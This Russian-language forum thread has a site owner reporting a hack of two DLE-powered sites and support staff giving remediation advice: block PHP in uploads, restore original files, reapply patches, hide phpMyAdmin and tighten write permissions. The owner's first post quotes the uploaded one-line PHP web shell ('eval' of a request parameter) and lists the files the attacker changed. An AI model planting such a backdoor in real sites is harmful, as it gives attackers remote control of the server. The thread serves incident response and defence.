Перейти к публикации

Рекомендованные сообщения

Здравствуйте, вчера взломали сервер, залили файл "uploads/s.php" с текстом в нем "<?php eval($_REQUEST[cmd]); ?>", через некоторое время залили еще пару файлов и модифицировали несколько файлов скрипта.

Версия движков 9.4 и 9.5, подобное происходило на обоих сайтов, я обнаружил сразу же и началось перетягивания каната мной и с хакером зразу же! через некоторое время хакер затих но дыра существует и не знаю где, все заплатки стоят и вот решил написать тут, существует ли платная или бесплатная подобная помощь от Вас ? извините если написал не по теме..

Спасибо за поддержку!

Ссылка на сообщение
Поделиться на других сайтах

Во первых в папке uploads/ должен распологаться файл .htaccess блокирующий запуск php скриптов, у вас его по непонятным причинам не было. Во вторых у вас стоит в открытом доступе уязвимая версия phpmyadmin на сервере , в третьих насколько я понял на сайте используютя PHP партнерки сомнительного происхождения. Это только то что видно сразу по вашему скудному описанию.

Все что касается DLE, то вам нужно восстанавливать все оригинальные файлы из архива дистрибутива, ставить все патчи повторно http://dle-news.ru/bags/ удалять с сервера все посторонние скрипты без исключения, все это проделывать для всех сайтов на вашем аккаунте. Хотя по хорошему сайты лучше обновить до актуальных версий DLE.

Обновить серверное ПО и убрать phpmyadmin на адрес известный только вам, а не всем без исключения. Сменить все пароли. Провести корректную настройку серверного ПО, чтобы по умолчанию не было прав на запись в файлы со стороны скриптов, у вас такие права существуют, что не соответствует самой простой безопасности.

Ссылка на сообщение
Поделиться на других сайтах

В папке uploads/ файл .htaccess существовал но им были удалены все строчки в нем, привожу пример антивируса сканера который установлен на сервере.

Первое изменение что появилось на сервере:

Добавлен файл: /uploads/s.php

после этого появились следующие изменения:

Добавлен файл: /engine/editor/css/img.php

Изменен файл: /engine/modules/antibot.php

Изменен файл: /engine/classes/js/jquery.js

Изменен файл: /uploads/.htaccess

По поводу уязвимой версии phpmyadmin, как писали по интернет сети, что в нем была уязвима одна папка со скриптами и которую следовало бы удалить, это папка была удалена на нашем сервере.

И всё-же, всё что писали Вы выше я учту, после моего ответа если у Вас появились другие идеи и ответы то напишите пожалуйста.

И еще, удалите пожалуйста ip моего сервера.

Спасибо за поддержку!

Ссылка на сообщение
Поделиться на других сайтах

Во первых в папке uploads/ должен распологаться файл .htaccess блокирующий запуск php скриптов...

Можно узнать как именно это должно быть прописано в .htaccess ? В Интернете разные варианты пишут. Спасибо.

Ссылка на сообщение
Поделиться на других сайтах

Можно узнать как именно это должно быть прописано в .htaccess ? В Интернете разные варианты пишут. Спасибо.

Если Вы покупали DLE скрипт то смотрите .htaccess файл в нем, что там прописано то и должно быть, а вот хорошо было бы если

чтобы по умолчанию не было прав на запись в файлы со стороны скриптов

смогли бы подсказать как это можно сделать ? например, написать названия файла сервера которую нужно вправить и подсказать нужную строку в нем.

Ссылка на сообщение
Поделиться на других сайтах

смогли бы подсказать как это можно сделать ? например, написать названия файла сервера которую нужно вправить и подсказать нужную строку в нем

Эти права выставляются по умолчанию вашим хостингом при копировании их на сервер по FTP, какие они должны быть зависит от серверного ПО и его настроек. Этот вопрос вам нужно уже уточнить в службе поддержки вашего хостинга. А вот на какие должны быть права на запись указано в инструкции по установке скрипта, и только на них должны быть права на запись, ни на какие другие файлы таких прав быть не должно.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...